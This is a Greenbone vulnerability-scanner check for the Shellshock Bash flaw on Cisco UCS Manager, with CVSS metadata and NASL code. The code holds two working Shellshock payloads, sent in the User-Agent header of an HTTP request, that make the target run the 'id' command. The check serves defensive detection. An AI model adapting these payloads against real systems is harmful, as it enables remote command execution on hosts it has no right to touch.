
Cisco UCS GNU Bash Environment Variable Command Injection Vulnerability (Shellshock)

2016-03-17 00:00:00
Copyright (C) 2016 Greenbone AG

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

9.5

Confidence

High

EPSS

0.973

Percentile

99.9%

On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to
the way in which shell functions are passed through environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell,
depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and
scripts hosted on web servers.

# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later

# Product this VT applies to; the detection VT listed under
# script_dependencies() is what registers instances of this CPE per host.
CPE = 'cpe:/a:cisco:unified_computing_system_software';

if( description )
{
  # --- identity and scoring -------------------------------------------
  script_oid("1.3.6.1.4.1.25623.1.0.105570");
  script_version("2023-04-18T10:19:20+0000");
  script_cve_id("CVE-2014-6278");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"creation_date", value:"2016-03-17 09:25:23 +0100 (Thu, 17 Mar 2016)");
  script_tag(name:"last_modification", value:"2023-04-18 10:19:20 +0000 (Tue, 18 Apr 2023)");

  script_name("Cisco UCS GNU Bash Environment Variable Command Injection Vulnerability (Shellshock)");

  # --- scheduling -----------------------------------------------------
  # ACT_ATTACK: this is an active check that sends a probe, so it runs in
  # the attack phase and only when the UCS Manager detection VT has set
  # its host key on a web port.
  script_category(ACT_ATTACK);
  script_family("CISCO");
  script_copyright("Copyright (C) 2016 Greenbone AG");
  script_dependencies("gb_cisco_ucs_manager_detect.nasl");
  script_require_ports("Services/www", 443);
  script_mandatory_keys("cisco_ucs_manager/installed");

  # --- references -----------------------------------------------------
  script_xref(name:"URL", value:"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash");
  script_xref(name:"URL", value:"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCur01379");

  # --- result quality / remediation class -----------------------------
  # remote_vul: the finding is backed by observed command output from the
  # target rather than by a version comparison.
  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  # --- descriptive text shown in the report --------------------------
  script_tag(name:"summary", value:"On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to
  the way in which shell functions are passed though environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell,
  depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and
  scripts hosted on web server");

  script_tag(name:"vuldetect", value:"Try to execute the `id' command by sending a crafted HTTP GET request and check the response.");

  script_tag(name:"insight", value:"GNU bash contains a flaw that is triggered when evaluating environment variables passed from another environment.
  After processing a function definition, bash continues to process trailing strings.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote  or local attackers to inject  shell commands, allowing local privilege
  escalation or remote command execution depending on the application vector.");

  script_tag(name:"solution", value:"See vendor advisory for a solution");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

# Runtime phase. Bail out quietly unless the detection VT recorded a UCS
# Manager instance for this host on some web port; nofork presumably keeps
# this script from forking once per detected location.
if( ! port = get_app_port( cpe:CPE ) )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

url = '/ucsm/isSamInstalled.cgi';
scanner_ua = http_get_user_agent();
vtstrings = get_vt_strings();
marker = vtstrings["default"];

# Two probe variants for the Bash environment-variable flaw. Each embeds the
# scanner marker string, presumably so the request can be attributed to the
# scanner in the target's web-server logs rather than mistaken for an attack.
payloads = make_list( '() { ' + marker + ':; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; id;',
                      '() { _; ' + marker + '; } >_[$($())] {  echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; id; }' );

host = http_host_name( port:port );

foreach payload ( payloads )
{
  # The probe travels in User-Agent, so the scanner's real identity is
  # carried in a separate X-Security-Scanner header for log attribution.
  headers = 'Host: ' + host + '\r\n' +
            'User-Agent: ' + payload + '\r\n' +
            'X-Security-Scanner: ' + scanner_ua + '\r\n' +
            'Connection: close\r\n' +
            'Accept: */*\r\n';
  request = 'GET ' + url + ' HTTP/1.1\r\n' + headers + '\r\n';

  # Full response (headers + body) is needed: the check matches on the
  # `id' output, which the probe emits after its own Content-Type header.
  res = http_keepalive_send_recv( port:port, data:request, bodyonly:FALSE );

  if( ! ( res =~ 'uid=[0-9]+.*gid=[0-9]+' ) )
    continue;

  # Evidence of execution seen: report the URL and the raw response.
  report = http_report_vuln_url( port:port, url:url ) + '\n\n';
  report += "It was possible to execute the `id' command on the remote host" + '\n';
  report += '\nResponse:\n' + res;
  security_message( port:port, data:report );
  exit( 0 );
}

# Neither probe produced command output: no finding for this host/port.
exit( 99 );
